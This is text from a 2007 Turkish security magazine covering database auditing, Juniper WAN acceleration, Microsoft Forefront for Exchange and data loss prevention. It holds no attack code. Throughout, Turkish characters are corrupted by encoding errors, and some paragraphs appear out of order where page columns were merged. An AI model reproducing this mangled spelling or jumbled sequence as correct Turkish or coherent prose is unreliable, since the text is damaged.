Hangisinin korunmas›na ihtiyaç var?” Sorun flu ki ilgili muhataplar› buldu¤unuzu var saysak bile ne kadar h›zl› ve do¤ru cevap alaca¤›n›z tart›fl›l›r olacakt›r. 2. DBA’lerinizin yard›m› ile sahip oldu¤unuz tüm veritabanlar›n› iyice bir gözden geçirirsiniz. Bu metot, sonuçlar› itibar› ile veritaban› güvenli¤i aç›s›ndan oldukça do¤ru kararlar alman›z› sa¤lar ancak takdir edilece¤i üzere çok zaman al›c› bir ifllemdir ve büyük kurumlarda sahip olunan veri miktar› düflünüldü¤ünde hiç de pratik bir çözüm de¤ildir. 3. Baz› hassas patern'leri filtreleyerek sonuca ulaflmay› de- neyebilirsiniz. Örne¤in VTYS üzerinde kredi kart› numaras›, kullan›c› kimlik bilgileri vs. gibi patern'leri filtreleyecek araçlar çal›flt›r›p bu tip verilerin hangi tablolarda, veritabanlar›nda oldu¤unu keflfedersiniz. 4. SAP, PeopleSoft vs. uygulamalarda haz›r bulunan ön tan›ml› listeleri kullan›p kurumsal anlamda sizin için önem arz eden bilgilerin nerelerde depoland›¤›n› bulmaya çal›flabilirsiniz. Asl›nda bunlar›n hepsi kendi içinde bir auditing ifllemidir ve yukar›daki metotlar›n hepsinde ortak olarak gözüken problem ise bilgilerinizin (bilhassa büyük kurumsal ortamlarda) çok de¤iflken olmas›ndan dolay› bu yapt›¤›n›z ifllerin s›k s›k yenilenmesi gere¤idir. Ortam›n›zdaki de¤iflikliklerin takibini nas›l yapacaks›n›z? Bu baflar›ya giden yolda önemli bir husustur ve genellikle “De¤ifliklik Yönetim Sistemleri” (change control tools) bu noktada bize yard›mc› olabilir. Elbette söz konusu de¤ifliklik takip sistemlerinin nihai olarak kuraca¤›m›z veritaban› güvenlik sisteminin içine bir otomatik auditing arac› flemsiyesi alt›nda entegre olmas›n› bekleriz çünkü bu bizi en ideal duruma biraz daha yaklaflt›rm›fl olacakt›r. Normal aktiviteyi nas›l tespit edece¤iz sorusuna dönelim. Yani normal flartlar dahilinde veritabanlar›m›zdaki kurumsal bilgilere nas›l erifliliyor? Bu noktada da biraz öncekine benzer flekilde birkaç de¤iflik yaklafl›m olabilir: 1. Gene ilgili birimlere sorma yolunu seçebilirsiniz. Avantaj ve dezavantajlar›na yukar›da k›saca de¤inmifltik. 2. Bilginin sadece uygulamalardan gelece¤ini var sayarak söz konusu uygulama kodunuzu gözden geçirirsiniz. Bu oldukça iyi bir yöntemdir ancak pratik de¤ildir çünkü söz konusu kodlar çok büyüktür, baflkas›ndan sat›n al›nm›flt›r, size açmazlar vs. 3. Sahip oldu¤unuz VTYS’nin Auditing imkanlar›n› devreye al›p normal aktivitenin ne oldu¤unu takip etmeye çal›flabilirsiniz. Ama bunu yapt›¤›n›zda k›sa zamanda milyonlarca sat›r log ile karfl› karfl›ya kalabilirsiniz (bunlar›n nerede depolanaca¤›, nas›l analiz edilece¤i ise ayr› bir sorundur). Burada da sahip olaca¤›n›z nihai güvenlik çözümün içine entegre olmufl bir otomatik auditing arac› oldukça faydal› olacakt›r. Bu noktada yukar›da birkaç de¤iflik vesile ile de¤indi¤imiz otomatik auditing arac›n›n temel baz› özelliklerinden bahsedelim. Sahip olaca¤›m›z (ya da olmam›z gereken) otomatik auditing arac›n›n 5N1K hakk›nda bize bilgi vermesini bekleriz: Kim: Kullan›c›lar hangi kullan›c› ad›yla veritabanlar›m›za ba¤lan›yor? Client-side iflletim sistemi üzerindeki (örn. Win- 26 beyazflapka flubat 2007 dows domain’lerindeki) hangi kullan›c›lar, veritaban› sistemimize hangi kullan›c› ad› ile erifliyor ve ayn› hesab› (örne¤in “sa” veya “test”) birden fazla kifli paylafl›yor mu? Kullan›c›lar›m›z›n hangileri, hangi hassas bilgilere erifliyor? Nerede(n): Nereden, hangi IP’den geliyorlar? Dinamik IP yönetimi yap›lan ortamlarda (DHCP vs.) hangi hostname’lerden eriflim var? Ne: Hangi tablolar üzerinde hangi sorgular› yap›yorlar (ne yap›yorlar)? Yapt›klar› sorgular›n ortak özellikleri ve detaylar› nedir? Ne zaman: Eriflim ne zaman yap›l›yor? Mesai saatleri dahilinde mi, hafta sonu mu, sadece sene sonunda bir gece yar›s› m› (batch job) vs.? Neden: Bir otomatik audit arac› buna tek bafl›na karar veremez ama güvenlik yöneticileri olarak bizim olan biteni anlamam›za yard›mc› olur. Hangi veritabanlar›na ve flemalarla ifl yap›yorlar? Nas›l: Hangi protokol üzerinden geliyorlar (stunnel? Cleartext port 1521)? Ya da PC’lerde yüklü bir uygulama ile mi (örn. TOAD.exe), yoksa bir uygulama içinden mi (örn. Oracle Application Server)? Söz konusu kullan›c›lar›n ayr›cal›kl› operasyonlar (drop table, backup vs.) yapmaya ihtiyac› var m›? Son olarak da var olan (ya da var olmas› muhtemel) zafiyetleri nas›l tespit edece¤iz sorusuna metodik yaklafl›m seçeneklerimizi gözden geçirelim: 1. Veritabanlar›m›z üzerinde zafiyet tarama araçlar› kullanabiliriz. Piyasada birçok araç var bu konuda. Baflka bir deyiflle, boksör antrenörü örne¤ini hat›rlarsak, sürekli olarak muhtemel zay›f noktalar› bulmak için veritabanlar›m›z› yumruklayabiliriz. Güvenlik yöneticilerinin en sevdikleri metotlar›n bafl›nda bu gelmektedir. 2. Büyük bir sab›rla, tüm veritaban› sistemleriniz üzerinde ince ayarlar ve kontroller yapabilirsiniz. Sistem parametreleri, registry kay›tlar›/de¤erleri incelemesi vs. yap›p muhtemel ve/veya bilinen aç›klar hakk›nda ipucu arars›n›z. Bu ifllem genellikle bir veritaban› uzman›n›n kat›l›m›n› da gerektirir. 3. Pasif de¤erlendirme yapabilirsiniz. Bu ifllem genellikle audit trail dosyalar›n›n veya sistem konfigürasyon dosyalar›n›n incelenmesini ve buralarda zay›fl›klar bulunmas›n› hedefler. Örne¤in düzenlemeyi unuttu¤unuz varsay›lan kullan›c› hesaplar› (default accounts), parolas› olmayan kullan›c› hesaplar› (Joe accounts), SQL Injection’a aç›k vulnerable query’lerin tespiti vs. Bu konuda da piyasada ücretli/ücretsiz bir çok araç var. Devam edecek... flubat 2007 beyazflapka 27 Murat ÖZDEM‹R [email protected] A¤ ve Uygulama H›zland›rma uniper WX/WXC platformlar› WAN üzerinde uygulamalar› s›k›flt›rma, protokol h›zland›rmas›, bantgeniflli¤i yönetimi , rota optimizasyonu ve raporlama tekniklerini entegre ederek LAN performans›nda çal›flmas›n› sa¤lar. WX/WXC platformlar› WAN kapasitesini yedek transmisyonu eleyerek, TCP ve uygulama tabanl› protokolleri h›zland›rarak (CIFS, MAPI, HTTP dahil), bantgeniflli¤i kullan›m›n› önceliklendirerek, farkl› rotalardan giden uygulama ak›fl›n› optimize ederek WAN kapasitesini artt›r›r. WXC platformlar› ayr›ca üzerindeki sabit disk sayesinde daha uzun trafik flablonu tutarak zaman içerisinde daha yüksek oranda trafik s›k›flt›rmas› sa¤lar. J bu flekilde WAN hat kapasitesinden geçebilecek gerçek trafi¤in ve uygulama performanslar›n›n artmas› en h›zl› bir flekilde sa¤lanm›fl olur. Application Flow Acceleration (Application-Specific Acceleration) Application Flow Acceleration (AppFlow) tekni¤i, WAN gecikmesi taraf›ndan etkilenen uygulamalar› saydam olarak h›zland›r›r. AppFlow tekni¤i özellikle 3 protokolde etkilidir: Microsoft Exchange taraf›ndan kullan›lan Messaging Application Programming Interface (MAPI), Microsoft dosya servisinin kulland›¤› Common Internet File System (CIFS), ve HTTP. fiekil-1 Uygulama baz›nda trafik s›k›flt›rma de¤erleri WX/WXC platformlar›n›n kulland›¤› teknikler sayesinde WAN hatlar› üzerindeki karfl›l›k verme kapasitesi artar; örne¤in TCP tabanl› uygulamalarda 5 kata kadar, Microsoft Exchange ve Windows dosya paylafl›m›nda 100 kata kadar. WX/WXC platformlar›n›n kulland›¤› teknikler ve özellikleri flu flekildedir: Molecular Sequence Reduction (SIKIfiTIRMA) Molecular Sequence Reduction (MSR), WX/WXC platformlar›n›n en önemli s›k›flt›rma algoritmas›d›r. Patentlenmifl olan bu teknik, kurumlar›n WAN data hatlar›n› 10 kata kadar kapasiteyle kullanmas›n› sa¤lamaktad›r. Bu teknik, paketlerin DNA’s›n› inceleyerek efllefltirme yapmaktad›r. MSR, tekrarlanan veri flablonlar›n› tan›r ve bunlar› etiketlerle de¤ifltirir. MSR tekni¤i tamam›yla cihaz›n haf›zas› üzerinde çal›flmaktad›r ve bu tekni¤in sözlü¤ü yüzlerce megabyte’l›k veri flablonlar›n› tutabilir. Active Flow Pipelining – TCP performans›n›, TCP ba¤lant›lar›n› yerel olarak sonland›rarak art›ran bir tekniktir. Bu teknik sayesinde yüksek bantgeniflli¤i veya yüksek gecikmeli ba¤lant› gereksinimi duyan uygulamalar h›zlan›r. Forward Error Correction – Kay›plar›n yafland›¤› hatlarda yinelenen paketleri eleyen bir tekniktir. Network Sequence Caching Network Sequence Caching, patent bekleyen WXC platformlar›nda olan bir tekniktir. Bu teknik t›pk› MSR s›k›flt›rma tekni¤inde oldu¤u gibi data flablonlar›n› IP seviyesinde tan›r ve etiketlerle de¤ifltirir. MSR tekni¤inden fark›, haf›zada de¤il sabit diskte gerçekleflmesidir. Bu teknik MSR tekni¤inden daha uzun veri flablonlar›n› gözlemlemesi ve aradan yüzlerce gigabyte data ve/veya haftalar geçse bile veri flablonlar›n› tan›yabilmesidir. Packet Flow Acceleration (TCP Acceleration) Packet Flow Acceleration (PFA), WAN üzerindeki TCP performans›n› artt›r›r. WX/WXC platformlar›nda uygulamalar›n önem derecesini ve/veya bantgeniflli¤i atamas›n› belirtebilirsiniz. WX/WXC platformlar› sadece IP veya ToS/DiffServ bilgisine de¤il 7. seviye uygulama bilgisine göre de s›n›fland›rma yapabilir. Örne¤in, 3. seviyede (Network) tüm Citix uygulamalar› ayn› gözüktü¤ü için SAP trafi¤ini yaz›c›ya gönderilen ifllemden ay›rmak için 7. seviye bilgisine ihtiyaç duyulmaktad›r. Exchange ve dosya servislerinde veri iletiflimi küçük bloklar fleklinde iletilmektedir ve bir ifllemin tamamlanmas› için yüzlerce hatta binlerce ACK gerekebilir. O yüzden 20ms, 30ms gibi gecikme olan hatlarda performans ve üretkenlik düflmektedir. Yine benzer flekilde HTTP uygulamas›nda bir sayfan›n yüklenmesi için düzinelerce RTT (round-trip-time) gerekebilir. Policy-Based Multipath (Path Optimizasyonu) AppFlow tekni¤i, veri bloklar›n› ve web objelerini biriktirip WAN kapasitesini dolduracak flekilde gönderir. Bu ifllemin sonucunda uygulama perfromans›nda 3 ile 100 kat› aras›nda geliflme sa¤lar. WX/WXC platformlar›nda 2 hatta sahip lokasyonlarda uygulamalar›n hangi hatt› kullanaca¤›n› bu yetenek sayesinde belirleyebilirsiniz. Sistem, hatlar›n performanslar›n› izleyerek, zaman içerisinde performans›n kabul edilebilir seviyelerde olmamas› durumunda otomatik olarak di¤er hatt› kullanmas›n› sa¤layabilir. Raporlama WAN ve uygulama performans›n› art›rmak için öncelikle a¤ içerisinde hangi trafik tiplerinin oldu¤unu, farkl› uygulamalar›n ne kadar bantgeniflli¤i kulland›¤›n›, a¤ içerisinde s›k›flma yafland›¤› durumda performans›n nas›l etkilendi¤ini iyi analiz etmeniz gerekir. MSR s›k›flt›rma yetene¤i farkl› uygulama tiplerinden faydalan›r. Hem k›sa, yo¤un data trafi¤i yaratan uygulamalar›n trafiklerini (Örnek: Citrix, HTTP), hem de uzun veri flablonlar› yaratan trafikleri (Örnek: Word dosyas›) etkili bir flekilde azalt›r. MSR sözlük tabanl› oldu¤u için tekrarlanan flablonlar› uzun baflka veriler aras›nda kalsa bile azalt›r. MSR s›k›flt›rmas›n›n WAN hatlar›n› rahatlatmas› çabuk gözlenir, 28 beyazflapka flubat 2007 PFA içeri¤i flu flekildedir: QoS (Bantgeniflli¤i Yönetimi) Fast Connection Setup – K›sa ömürlü ba¤lant›lar›n performans›n›, TCP ba¤lant› kurulumunun round-trip zaman›n› eleyerek sa¤lar, bu flekilde HTTP gibi uygulamalar h›zlan›r. Bantgeniflli¤i yönetimi hem Quality of Service (QoS) yetene¤ini hem de kritik ve gecikmeye duyarl› uygulamalar için bantgeniflli¤i atamas›n› içermektedir. WX/WXC platformlar› iki ana yaz›l›m arac› sayesinde bu yetkinli¤i sa¤lar. WebView yaz›l›m› cihaz›n içerisinde yer alan, cihaz bafl›na konfigürasyon, yönetim ve trafik gözlemlemesinin yap›labildi¤i bir araçt›r. WX Central Management System (CMS) yaz›l›m› ise tek bir noktadan tüm WX/WXC platformlar›n›n konfigürasyon, yönetim ve trafik gözlemlemesinin yap›labildi¤i bir araçt›r. flubat 2007 beyazflapka 29 Mehmet ÜNER [email protected] Forefront Security for Exchange Server eyaz fiapka’n›n Kas›m say›s›nda Exchange 2007 ile gelen güvenlik özelliklerinden bahsetmifltik. Bu güvenlik özellikleri d›fl›nda Exchange 2007’yi korumak için flu anda kullan›labilecek Anti-virüs ve Anti-Spam yaz›l›mlar›ndan biri de “Microsoft Forefront Security for Exchange Server”. Microsoft Antigen for Exchange Server’in yeni versiyonu olan bu yaz›l›m, sadece Exchange 2007’ye kurulabiliyor. Exchange 2003 ve 2000 sunucular› ise Microsoft Antigen for Exchange Server korumaya devam ediyor. Kas›m ay›nda Forefront sunucu ailesinin lansman› yap›lan di¤er ürünü de Forefront Security for Sharepoint. Forefront sunucu ailesi 2007 y›l› içinde gelecek olan Forefront Security for Office Communications ile tamamlanm›fl olacak. Böylece e-posta sunucular›, an›nda mesajlaflma sunucular› ve portal sunucular› Forefront sunucu ailesiyle birlikte, gittikçe ak›ll› hale gelen ve uygulamalar› hedef almaya bafllayan kötü niyetli sald›r›lara karfl› koruma alt›na girmifl olacaklar. B Forefront Sunucu ailesinin en önemli özelli¤i, ister Sharepoint’i ister Exchange sunucular› ister an›nda mesajlaflma sunucular›n› koruyor olsun, bu korumay› en üst düzeye ç›karmak için endüstrinin önde gelen güvenlik firmalar›ndan sa¤lanan tarama motorlar›n› tek bir çözümde birlefltirilmifl olmas›d›r. Böylece gelen bir e-posta, sharepoint sitesine yüklenen bir doküman veya an›nda mesajlaflmadaki dosya transferleri tek bir anti-virüs motoru yerine, 9 ayr› motor taraf›ndan kontrol edilebiliyor (fiekil 1). Bu da, korumay› oldukça yüksek bir seviyeye ç›kar›yor. 2006’da kurumlar›n yaklafl›k yüzde 97’si, virüslerden koruma yaz›l›m› kullanmalar›na ra¤men, yüzde 65’i virüs sald›r›lar›ndan zarar gördü(*). Buna neyin sebep oldu¤u sorusunu kendimize sorarsak en önemli sebebin, kurumlar›n tek bir tarama motoruna sahip anti-virus yaz›l›mlar› kullanarak kritik görev sunucular›n› korumaya çal›flmalar› oldu¤unu görürüz. E¤er bu motor, en son riskleri h›zla tan›makta baflar›s›z olursa, veya o motora güncelleme gelifltiren anti-virüs laboratuvar› bir virüs sald›r›s› s›ras›nda güncellemede geç kal›rsa, virüsler kurumlar›n kritik sunucular›na zarar verebilir. Bu senaryo Forefront sunucu ailesinde geçersiz oluyor, çünkü Forefront sunucu ailesi ön yüzünde Microsoft olmas›na ra¤men 9 ayr› anti-virüs motoru sayesinde 9 la(*) CSI/FBI 2006 Anketi boratuvar›n gücünü kurumlara sunuyor (flekil 2). Böylece virüsler bir motoru atlat›rlarsa di¤er motor taraf›ndan yakalan›yorlar, bir laboratuvar güncellemede gecikirse, di¤er laboratuvar bu a盤› kapat›yor. Belki de hepsinden güzeli, ön yüzde sadece Microsoft oldu¤u için motorlar›n bütün güncellemeleri ve ihtiyaç duyulan destek tek bir noktadan gelebiliyor. 9 ayr› motora sahip olman›n avantajlar›ndan biri de güncellefltirmeler boyunca kesintiye u¤ramayan posta ak›fl›. Normal bir anti-virüs çözümünde güncellefltirme yap›laca¤› zaman e-postalar bekletilir ve tarama motoru için imza güncellefltirmesi yap›l›r. Forefront Sunucu ailesinde ise sahip olunan birden fazla motor çözümü ile, bir motor güncellefltirme için çevrimd›fl› oldu¤unda bile di¤er motorlar e-posta taramalar› için kullan›labilir. fiekil 2 – Forefront Anti-virüs Motorlar› Yaz›n›n geri kalan›nda Forefront Security for Exchange Server üzerinde biraz daha fazla dural›m. Özellikle Exchange Server 2007’ye geçifl yapmay› düflünen kurumlar için güvenlik aç›s›ndan oldukça önemli bir çözüm. Exchange Server 2007 beta sürümleri ile birlikte Forefront Security for Exchange Server’in beta sürümlerinin ç›kmas›, Microsoft’un güvenli¤e yeni bak›fl›n›n bir parças›. Kritik uygulamalar daha beta aflamas›ndayken, özel olarak tasarlanm›fl güvenlik ürünleri ile koruma alt›na al›nabildiler. Ve yeni sunucu uygulamalar› piyasaya ç›kt›¤› anda güvenlik ürünlerinin de son sürümleri haz›rd›. plan taramalar› için zaman ve posta kutusu tan›mlar›n›n yap›labilmesi. Böylece virüs tafl›ma olas›l›¤› yüksek posta kutular› veya sadece son zamanlarda gelen e-posta’lar kontrol edilebilir. Geriye dönük bütün posta kutular› taranmad›¤› için performans kayb› yine engelleniyor. Forefront ayn› zamanda taramalar›n› bellek içinde yap›yor. Tarama ifllemi için disk kullan›lmad›¤›ndan ifllem çok daha h›zl› oluyor ve veri birikimi engelleniyor. Bununla beraber, birden fazla tarama ifllemi (daha fazla postay› tek bir seferde ifllemek için) kullanabilme olas›l›¤›, sunucu performans›n› oldukça gelifltiriyor. Exchange Server 2007, yeni sunucu rolleri ile gelifltirildi. Bunlar Edge, Hub, Mailbox, Client Access ve Unified Messaging rolleri. Forefront Security for Exchange Server bu rollerin hepsi üzerine kurulabilir ve Exchange Sistemlerini koruyabilir. Farkl› rollerin olmas› Exchange Sistemi için ayn› zamanda performans artt›r›c› bir özellik. Farkl› rollere sahip sunucular, kurum içinde çok daha iyi bir ölçeklenme sa¤layabiliyorlar. Bu ayn› zamanda virüs sistemi için de performans artt›r›c› bir özellik. Çünkü mesajlar, Forefront ile ilk rolde tarand›ktan ve güvenli olduklar›na karar verildikten sonra di¤er rollerde Exchange 2007 ile entegre çal›fl›larak tarama yap›lmas›na gerek kalm›yor. Tekrar tekrar tarama olmaks›z›n e-postalar daha h›zl› ak›yor ve sunucular afl›r› yükten dolay› performans kayb› yaflam›yorlar. Performans› artt›r›c› özelliklerden biri de Mailbox sunucular›nda yap›lan arka Performans konusu aç›ld›¤› zaman akla gelen ilk fleylerden biri de Forefront içindeki 9 tarama motorunun beraber çal›flmas›n›n performans› nas›l etkileyece¤idir. Bunun için Forefront içinde “Bias” ayarlar› bulunmaktad›r (fiekil-3). Bias ayarlar›na örnek olarak maksimum güvenlik, maksimum performans ve ‘neutral’ verilebilir. Maksimum güvenlik k›sm›nda seçilen bütün anti-virüs motorlar› ayn› anda kullan›l›r. Maksimum performans k›sm›nda ise seçilen motorlar›n sadece %25’i kullan›l›r. Ayn› flekilde ‘neutral’ ayar›nda seçilen motorlar›n %50’si kullan›l›r. Forefront’un anti-virüs motorlar›n› seçimi ise özel algoritmalara dayan›r. Örnek olarak 4 motor ve ‘neutral’ ayar› seçilmiflse, gelen bir e-posta iki motor taraf›ndan taran›r. Bu motorlar geçmifl performanslar›na, hangisinin daha fazla virüs yakalad›¤› ve en son güncellemeleri ne zaman yapt›¤›na göre seçilir. Böylece en iyi performans gösteren motorlar kuruma gelen e-postalar› taram›fl olurlar. fiekil 1 – Forefront Sunucu Korumas› Anti-virüs kadar birçok kurumun s›k›nt› yaflad›¤› baflka bir konu ise istenmeyen e-posta’lar. Bu kategori içerisinde spam, içerikleri kötü olan, veya istenmeyen eklentilere sahip olan e-postalar gösterilebilir. Forefront Security for Exchange Server, üst düzey içerik filtresi ile istenmeyen e-postalara karfl› etkin bir koruma sa¤lar. Eski deneyimlerden yararlanarak problem çözme (deneyimsel) yöntemleri ve dosya filtreleme teknolojileri, tehlikeli dosyalar› –örne¤in çal›flt›r›labilir dosyalar- uzant›lar› de¤iflmifl olsa bile yakalayarak kurumlar› istenmeyen e-postalardan korur. Ay- 30 beyazflapka flubat 2007 fiekil 3 – Forefront Bias Ayarlar› n› flekilde spam korumas› taraf›ndaysa Microsoft IP Reputation Servisi, içerik filtreleme için Intelligent Message Filters (IMF) ve spam imza dosyalar› gibi özellikler bulunmakta. Asl›nda Exchange 2007’nin içinde bulunmalar›na ra¤men, bu üst düzey istenmeyen e-posta koruma hizmetleri, sadece Forefront Security for Exchange Server lisans› ile etkinlefltirilebilir. ‹stenmeyen e-postalara karfl› koruma araçlar›, sürekli olarak etkin haldedir ve her gün birkaç kez otomatik olarak güncellefltirilir. Anti-virüs yaz›l›mlar›n›n en önemli sorunlar›ndan biri de yönetim zorluklar›d›r. Forefront Security for Exchange Server ile bu sorun da ortadan kalk›yor. Kendi yerleflik yönetim konsolu d›fl›nda, web tabanl› Microsoft Forefront Server Security Management konsolu ve Microsoft Operations Manager (MOM) entegrasyonu ile yönetim oldukça kolaylafl›yor. Basitlefltirilmifl bir arayüz sunan yönetim konsolu üzerinden Forefront’un bütün ayarlar› yap›labiliyor. Yönetim konsolu ile sunucular lokalden veya uzaktan yönetilebiliyor. Merkezi web tabanl› yönetim sayesinde ise merkezi yap›land›rma, yerlefltirme ve güncellefltirme sa¤lan›yor. Ayn› zamanda birden fazla sunucu uzaktan kolayca yönetiliyor ve kapsaml› raporlar oluflturulabiliyor. Son olarak belki de lisanslamadan bahsetmek gerekiyor. Forefront Security for Exchange Server lisans› ile Exchange 2007 sunucular›n› korumak d›fl›nda, ayn› zamanda Microsoft Exchange Server 2003 ve Microsoft Exchange Server 2000 ortamlar›n›n korunmas›na yard›mc› olmak için Microsoft Antigen for Exchange, Microsoft Antigen for SMTP Gateways ve Antigen Spam Manager kullanmalar› için de lisanslanm›fl oluyor. Özetle Forefront sunucu ailesi, kurumlar›n kritik uygulama sunucular›n› tam bir koruma alt›na al›yor ve kendine özel teknolojilerle güvenlik seviyesini en üst düzeye ç›kar›yor. Microsoft’un güvenli¤e bak›fl›n›n önemli bir parças› olan Forefront sunucu ailesi, anti-virüs sektörünün en önemli oyuncular›ndan biri olacakm›fl gibi görünüyor. flubat 2007 beyazflapka 31 Sinan YILMAZ [email protected] Data Loss Prevention (DLP) BEYAZ APKA OF S N ZE GELD , S ZE TESL M ED LD . S Z DE (UMARIZ) SABIRSIZLIKLA B LG SAYARINIZIN BA INDA BEYAZ APKA’YI OKUMAYA BA LADINIZ. PEK , ÖNÜNÜZDEK B LG SAYARDA NE G B ÖNEML B LG LER VAR? roje dokümanlar›, bütçe dosyalar›, rakip analizleri, personel giderleri, teknik dokümanlar, fiyat listeleri, araflt›rma gelifltirme çal›flmalar› vs… Hepimizin çok de¤erli bilgilerini tafl›yor art›k bilgisayarlar. Hem kendimiz hem de flirketimiz için de¤erli bilgiler. De¤erli veri bilgisayarlardan çeflitli yöntemlerle çal›n›rsa ya da iyi niyetli oldu¤unu söyleyemeyece¤imiz flirket çal›flanlar› taraf›ndan rakiplerimize s›zd›r›l›rsa zarar›m›z ne olur? P Bu yaz› “Hiçbir fley olmaz can›m” diyenler için de¤ildir. Bahsetti¤im riskleri önlemek birço¤umuzun proje listesinde duruyor. Asl›nda arad›¤›m›z fleyin tam ad› Data Loss Prevention. Nedir? Data Loss Prevention, son zamanlarda bilgi güvenli¤i sektöründe ad›ndan s›kça bahsedilen bir terim. Temel anlam› bilgi kayb›n›n engellenmesi oldu¤u için ço¤u zaman yanl›fl anlafl›lmalara da neden olan DLP, sektörde standartlaflmaya bafllayan bir tabir oldu. Genifl olarak bakarsak bir antivirus yaz›l›m› da bilgi kayb›n› engeller bir yedekleme yaz›l›m› da. Ancak DLP terimi baflka bir mecraya do¤ru gidiyor. ‘Gidiyor’ diyorum çünkü DLP sektörde de¤iflmez bir standart isim haline henüz gelebilmifl de¤il. Öyle ki bu yaz›y› yazd›¤›mda wikipedia ve kutsal bilgi kayna¤›(?) ekfli sözlük Data Loss Prevention teriminin karfl›l›¤›n› henüz ö¤renememiflti. Ayr›ca Gartner ve benzeri araflt›rma kurumlar›nda DLP ad›nda bir kategori de henüz bulunmuyor. Sözünü edece¤im DLP ürünleri baz› raporlarda içerik izleme ve filtreleme gibi kategorilerde yer alabiliyorlar. Data Loss Prevention, bilgi güvenli¤inde de¤erli verilerin baflkalar›n›n eline geçmesini engellemek üzere tasarlanm›fl teknolojiye verilen bir isimdir. Ne yapar? DLP teknolojisi verinin kayna¤› ile ilgilenir. Özel kullan›c›lar için ekstra yetkiler tan›mlanabilmesine karfl›n genel olarak bilgi koruma mant›¤› ayn›d›r. Hatta baz› ürünlerde güvenilir kullan›c› tan›m› bulunmaz. Merkezi olarak yönetilen DLP sistemi, önceden tan›mlanm›fl kaynaklar› koruma alt›na al›r. Korunan kaynaklar üzerinde yap›lan 32 beyazflapka flubat 2007 tüm ifllemler raporlan›r ve kayna¤›n güvenlik gözü ile izlenmesine imkân sa¤lan›r. DLP ürünlerinin tamam› girifl/ç›k›fl ayg›tlar›n›n denetimini yapabilir. De¤erli verinin uygulamalar üzerinden (email, webmail, IM, P2P, Skype), a¤ sistemleri üzerinden (wi-fi, bluetooth, http(s), ftp), fiziksel ayg›tlar üzerinden (yaz›c›lar, usb haf›zalar, faks, cd/dvd) baflka sistemlere gönderilmesini engeller. DLP veriyi korumaya yönelik gelifltirildi¤i için hack edilmifl, Truva at› bulaflm›fl, güvenlik zaaf› bulunan veya hatal› konfigüre edilmifl bilgisayarlardan veri çal›nmas›n› engeller. Baz› DLP ürünleri için kullan›c›n›n nerede oldu¤u önemli de¤ildir. Tafl›nabilir bilgisayarlar flirket a¤›nda de¤ilken bile agent mimarisi sayesinde koruma kalkan›n› her zaman çal›flt›rabilir. DLP ürünleri sunucu sistemlerinde, istemcilerde, tafl›nabilir bilgisayarlarda, Blackberry gibi avuçiçi bilgisayarlarda çal›flt›r›labilir. Tüm DLP sistemi da¤›t›k ortamlarda olmas›na ra¤men merkezi olarak yönetilebilir ve raporlanabilir. DLP ürünleri de¤iflik biçimlerde bulunan kaynaklar› koruyabilir. fiifrelenmifl dosyalar, klasörler, bilgi bankalar›, s›k›flt›r›lm›fl dosyalar koruma alt›na al›nabilir. Ne de¤ildir? Data Loss Protection bilgi güvenli¤i sektöründe tam bir standarda kavuflmufl bir tabir de¤il. DLP oldu¤unu iddia eden ancak pek DLP kategorisine koyamayaca¤›m›z birkaç örnek verelim: Key Logger Yaz›l›mlar› DLP oldu¤unu iddia eden bir ürün bilgisayarlar üzerinde dedektif gibi çal›fl›yor. Bilgisayarda girilmifl her veriyi gizlice kay›t ediyor ve sistem yöneticisi (ya da patron) bu bilgileri görebiliyor. Üstelik baz› önemli kelime ya da dosyalar›n ifllem görmesi s›ras›nda yöneticilere otomatik bir gerçek zamanl› uyar› gönderilebiliyor. Ancak bu ürünleri genel DLP kategorisine almamak gerekir. Yedekleme Yaz›l›mlar› Baz› ürünler dokümanlar›n güvenli¤ini sa¤lamak için, dokümanlar›n her sürümünün bir yede¤ini tutar. De¤ifltirilen bir doküman›n hem yeni hem de eski sürümleri sistem taraf›ndan yedeklenir. ‹htiyaç duyuldu¤u anda dosya istenilen sürüme geri dönülebilir. Ancak bu yaz›l›mlar›n DLP olarak adland›r›lmas› pek do¤ru say›lmaz. Bu yaz›l›mlar gelifltirilmifl yedekleme yaz›l›mlar›d›r. Kurtarma Yaz›l›mlar› Zarar görmüfl ve bozulmufl dosyalar› kurtarmaya yarayan yaz›l›mlardan baz›lar›, DLP teriminin bilgi güvenli¤i sektöründe güncel bir terim haline gelmesi sebebi ile bu terimi kullanmaya bafllad›lar. Ancak kurtarma yaz›l›mlar›n›n hiçbiri sözünü etti¤imiz DLP kategorisine girmez. DLP oldu¤unu iddia etmemesine karfl›n, DLP ifllevleriyle kar›flt›r›lan baz› teknolojiler de var. Kar›flt›r›lmasalar bile farklar›n k›saca üzerinden geçmek faydal› olacakt›r diye düflünüyorum ve birkaç örnek vermek istiyorum. Digital Rights Management (DRM) Data Loss Prevention bir Digital Rights Management ürünü de¤ildir. DRM verileri flifreli biçimde tutabilir ve daha önceden güvenli biçimde tan›mlanm›fl kullan›c›lara özel yetkiler tan›mlanabilir (veriyi açabilme, de¤ifltirebilme, yazd›rabilme, da¤›tabilme, yeni yetki tan›mlayabilme gibi). DRM ile güvenlik alt›na al›nm›fl veriler baflka sistemlere transfer edilebilir. Ancak güvenli kullan›c› tan›m› nedeni ile yetkisiz kimseler bu verileri açamazlar. DRM, flifreleme ve yetkilendirme aç›s›ndan DLP’den daha üstün bir üründür. Ancak kullan›m› için DRM kullan›c›lar›n›n biliflim sistemlerini kullanma kabiliyetlerinin yüksek olmas› ve s›k› bir e¤itimden geçirilmeleri gerekir. Kullan›m aç›s›ndan daha zor olan DRM, DLP’nin rakibi de¤ildir. Hatta her iki sistem entegre edilip birlikte kullan›labilir. den geçmek istiyorum: Finansal Dokümanlar En s›k kullan›ld›¤› aland›r. Bütçe, nakit ak›fl›, finansal risk analizleri ve bordro gibi hem flirketi içine hem flirket d›fl›na s›zmas› riskli olan dokümanlar DLP korumas› alt›na al›n›r. Kredi kart› ve benzeri bilgileri de unutmayal›m. Müflteri Bilgileri Müflteri listeleri, eriflim bilgileri, müflteriler ve sat›lan ürünlerin iliflkilerinin bulundu¤u tablolar, potansiyel müflteri listeleri ve müflterilere özel uygulamalar›n korunmas› özellikle Sarbanes-Oxley gibi geliflmifl denetimlere tabi tutulan Amerikan flirketleri ve Amerikan borsalar›nda ifllem gören uluslar aras› flirketler için zorunluluktur. fiirketler gerek müflterilerini risklerden korumak, gerekse standartlara uymak için müflteri bilgilerini DLP ile koruma alt›na al›rlar. Kaynak Kodlar ‹ç kullan›m için ya da pazarlanmak için gelifltirilen yaz›l›mlar›n kaynak kodlar›n› korumak, ilgili projenin ve ilgili flirketin gelece¤ini korumak anlam›na gelir. DLP, kaynak 